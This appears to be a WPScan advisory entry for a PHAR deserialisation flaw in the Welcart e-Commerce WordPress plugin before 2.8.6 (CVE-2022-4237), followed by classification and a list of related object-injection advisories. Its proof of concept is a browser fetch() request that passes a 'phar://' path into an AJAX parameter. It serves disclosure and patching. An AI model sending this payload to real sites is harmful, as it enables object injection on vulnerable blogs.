WordPress Plugin Vulnerabilities

Welcart e-Commerce < 2.8.6 - Subscriber+ PHAR Deserialisation

Description

The plugin does not validate user input before using it in file_exist() functions via various AJAX actions available to any authenticated users, which could allow users with a role as low as subscriber to perform PHAR deserialisation when they can upload a file and a suitable gadget chain is present on the blog

Proof of Concept

Run the below command in the developer console of the web browser while being on the blog as subscriber user

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=wel_check_progress_ajax&progressfile=phar://path-to-uploaded-phar.phar/log.txt',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Affects Plugins

Plugin icon
usc-e-shop
Fixed in 2.8.6

References

CVE
CVE-2022-4237

Classification

Type
OBJECT INJECTION
OWASP top 10
A8: Insecure Deserialization
CWE
CWE-502
CVSS
7.5 (high)

Miscellaneous

Original Researcher
WPScan
Verified
Yes
WPVDB ID
7a4b790c-49ae-46bc-9544-e188deae243f

Timeline

Publicly Published
2022-12-05 (about 1 years ago)
Added
2022-12-06 (about 1 years ago)
Last Updated
2022-12-06 (about 1 years ago)

Other

Published
Title
Published
2023-04-10
Title
SEOPress < 6.5.0.3 - Admin+ PHP Object Injection
Published
2023-08-17
Title
wpDataTables < 2.1.66 - Admin+ PHP Object Injection
Published
2017-04-27
Title
AJAX Random Posts <= 0.3.3 - Unauthenticated PHP Object Injection
Published
2022-10-10
Title
Smart Slider 3 < 3.5.1.11 - PHP Object Injection
Published
2023-04-10
Title
Advanced Custom Fields < 6.1.0 - Contributor+ PHP Object Injection